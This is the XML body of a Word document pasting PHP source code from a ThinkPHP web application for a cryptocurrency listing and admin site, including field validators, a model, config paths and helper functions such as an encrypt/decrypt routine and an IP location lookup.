          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>币名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require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F829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llname|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全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max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49D6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llname_zh|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中文全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max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2C8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ite_paper|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白皮书</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url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2AC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lock_url|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区块地址</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url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C29B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fficial_website|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网</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url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77029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num|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上架交易所数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number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F90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ulation|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流通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number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DDD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circulation|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发行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number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A17D7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AC90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A39EA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AE2E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namespace app\admin\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE85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12ED1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ategory extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA53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A454D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2FCDD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单名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require|max:50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07105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d|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示位置</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18364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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单排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74E2A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5B8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F55C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validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4B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FD1B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dmin extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C970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A1BB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3499E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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>权限</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0E5EA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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁用</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612EB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785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9206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validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA9D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6E63D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latform extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EFD0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615B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5B515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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用名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require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD25D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否隐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535FB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ore|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评级</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between:1,5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9FF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3A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F455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2C862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validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F4B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24A41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mber extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2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CB337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4257E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                         =&gt;      'max:200|alphaDash',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41207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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</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number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                     =&gt;      'max:200',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D9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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>余额</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number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E49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ore|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                        =&gt;      'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED7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gyan|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经验值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                    =&gt;      'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADC2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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                     =&gt;      'min:6'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E0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71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92CA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validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E5C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07B63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Typeid extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC4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3FCF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4B3E61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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w: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 xml:space="preserve">    =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3337A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否隐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797570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id|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                      =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295FF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114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B6E1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dmin\model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB8F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Model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05581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Typeid extends Model{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFEF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protected $name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'typeid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127566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protected $auto </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5D7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protected $insert </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880A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rotected function setCreatetimeAttr(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E4C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ime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D176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05A02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rotected function setUpdatetimeAttr(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44D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ime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04120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42736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FFE3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6718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3D89C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replace_str'  =&gt;  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C01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__PUBLIC__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D45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t>'__STYLE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public/style/admin/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B49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 xml:space="preserve">    '__CSS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public/style/admin/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565856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JS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xml:space="preserve">'/public/style/admin/js/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA8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G__'</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xml:space="preserve">'/public/style/admin/img/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47918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PLUGINS__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">'/public/style/admin/plugins/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606F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AGES__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/uploads/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB9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IMGERROE__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/style/admin/img/images.jpg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE46D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39557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adminClass'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1912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main'</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animated fadeInRight',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0F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top'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B84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lef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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9E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igh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   ',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31465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72FB1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appkey'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585C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p'</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51601367eff4ff5de64633ff127b75e8'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19102B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1C637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inate'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E350D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bootstrap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F2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page'  =&gt; 'page',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B4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rows' =&gt; 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7D9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DE1F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route_on'           =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C02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38120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BB8E4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5F27B8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11ED23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model\Send; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B4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cache($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B204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db'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6F1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5F94E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ECFC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35CD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encrypt($string, $operation = 'E', $key = '|www.ffxiang.cn|')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95AD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8234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key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE00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_length = strlen($key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EE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 = $operation == 'D' ? base64_decode($string) : substr(md5($string . $key), 0, 8) . $string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E38F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ing_length = strlen($string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF5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ndkey = $box = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE84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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF81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 ($i = 0; $i &lt;= 255; $i ++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F51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ndkey[$i] = ord($key[$i % $key_length]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D3A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ox[$i] = $i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55634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CF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 ($j = $i = 0; $i &lt; 256; $i ++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3B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 = ($j + $box[$i] + $rndkey[$i]) % 256;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CAC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mp = $box[$i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EE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ox[$i] = $box[$j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD5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ox[$j] = $tmp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147F3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72F7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 ($a = $j = $i = 0; $i &lt; $string_length; $i ++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289790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a + 1) % 256;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598548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 = ($j + $box[$a]) % 256;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692832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mp = $box[$a];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613B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ox[$a] = $box[$j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEB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ox[$j] = $tmp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647A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chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071842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BE79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operation == 'D') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E51F3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ubstr($result, 0, 8) == substr(md5(substr($result, 8) . $key), 0, 8)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F552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ubstr($result, 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36765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5B4B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318070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5A4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D995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tr_replace('=', '', base64_encode($result));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC78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EC5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A849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decrypt($text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20F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BD15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ext) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7CA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797E0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474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_encrypt($text, 'D');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E7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explode('|www.ffxiang.cn|', $text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75159D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text[1])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948C8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58536B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4DF6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abs($text[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31073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text[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B1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0A4628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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EA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F46D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amp;&amp; $password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FF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gt;where(['id' =&gt; $id, 'password' =&gt; $password, 'hide' =&gt; 1])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35044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 $id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F459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2BBA9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0EB2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47630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10E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99AE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35B0B2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ACB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A7DC0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p($ip=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546B2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p){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449D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request()-&gt;ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCEE1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BF4D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s=file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD6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s=json_decode($ips,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E90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ps){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC75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ips['region'].$ips['city'].','.$ips['ip'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F3A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CBC5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未知</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,'.$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC5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F79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ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189F9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5330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mg($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD8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68A06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img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C28B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1649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ublic/style/index/img/images.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA14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DCD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057B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F7AC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substr($title,$length=20,$dian='...'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0D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b_strlen($title) &lt;= $length){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C3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itle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738B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63AF0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b_substr($title,0,$length,'utf-8').$dian;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E220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66F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C2A4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CBBE5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tongjiField($name,$where,$addDel=1,$field='tongji',$int=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F605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ddDel==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC014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name)-&gt;where($where)-&gt;setInc($field,$int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF6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5BFB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name)-&gt;where($where)-&gt;setDec($field,$int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37697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7590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 ? 1 : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E5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6A44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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265936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ychannelName($id,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A17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D843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ychannel')-&gt;where('id',$id)-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54130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811B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5A24D9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A92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3EDB3C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A479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6FC80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86F3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D6DD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typeid($id='',$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AACD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url'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B34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url('typeid',['id'=&gt;$id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C0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url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F964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472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typeid')-&gt;where(['id'=&gt;$id])-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F19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B545F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1ED12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C6E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2532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typeidTid($arr,$tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACAA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D8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arr as $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0298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id'] == $tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CD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v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B50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_merge($data,_typeidTid($arr,$v['id']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077963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10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C69F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3CF4B7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32331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count($table,$where=[],$field='id'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48402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able){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6152A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请输入数据表统计</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B595A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DDF6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table)-&gt;where($where)-&gt;count($field);</w:t>
      </w:r>
    </w:p>
